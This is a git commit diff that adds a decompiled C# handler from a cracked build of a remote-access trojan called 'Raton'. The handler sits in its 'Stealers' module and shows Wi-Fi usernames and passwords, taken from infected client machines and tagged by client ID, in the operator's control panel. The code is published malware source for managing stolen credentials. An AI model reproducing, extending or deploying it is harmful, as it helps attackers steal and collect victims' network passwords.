initial commit
This commit is contained in:
@@ -0,0 +1,44 @@
|
||||
// Decompiled with JetBrains decompiler
|
||||
// Type: Server.Handlers.HandleWifi
|
||||
// Assembly: Raton, Version=0.4.0.0, Culture=neutral, PublicKeyToken=null
|
||||
// MVID: 36C4E416-7F8D-4D23-930F-B5CCB0D810E7
|
||||
// Assembly location: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Raton.exe
|
||||
|
||||
using Raton.Forms.ClientForms.Stealers;
|
||||
using Server.Connection;
|
||||
using Stuff;
|
||||
using System;
|
||||
using System.Windows.Forms;
|
||||
|
||||
#nullable disable
|
||||
namespace Server.Handlers;
|
||||
|
||||
internal class HandleWifi
|
||||
{
|
||||
public HandleWifi(SillyClient SillyClient, Unpack unpack)
|
||||
{
|
||||
ratonWifi formPassword = (ratonWifi) Application.OpenForms["Wifi | Client ID: " + unpack.GetAsString("UID")];
|
||||
if (formPassword == null)
|
||||
return;
|
||||
if (formPassword.SillyClient == null)
|
||||
formPassword.SillyClient = SillyClient;
|
||||
formPassword.Invoke((Delegate) (() =>
|
||||
{
|
||||
string asString1 = unpack.GetAsString("User");
|
||||
string asString2 = unpack.GetAsString("Pass");
|
||||
formPassword.aeroListView1.Items.Add(new ListViewItem(asString1)
|
||||
{
|
||||
SubItems = {
|
||||
asString2
|
||||
},
|
||||
ImageIndex = 0
|
||||
});
|
||||
formPassword.aeroListView1.AutoResizeColumns(ColumnHeaderAutoResizeStyle.ColumnContent);
|
||||
formPassword.aeroListView1.EndUpdate();
|
||||
formPassword.label1.Visible = false;
|
||||
formPassword.aeroListView1.Visible = true;
|
||||
foreach (ColumnHeader column in formPassword.aeroListView1.Columns)
|
||||
column.Width = formPassword.aeroListView1.Width / formPassword.aeroListView1.Columns.Count;
|
||||
}));
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user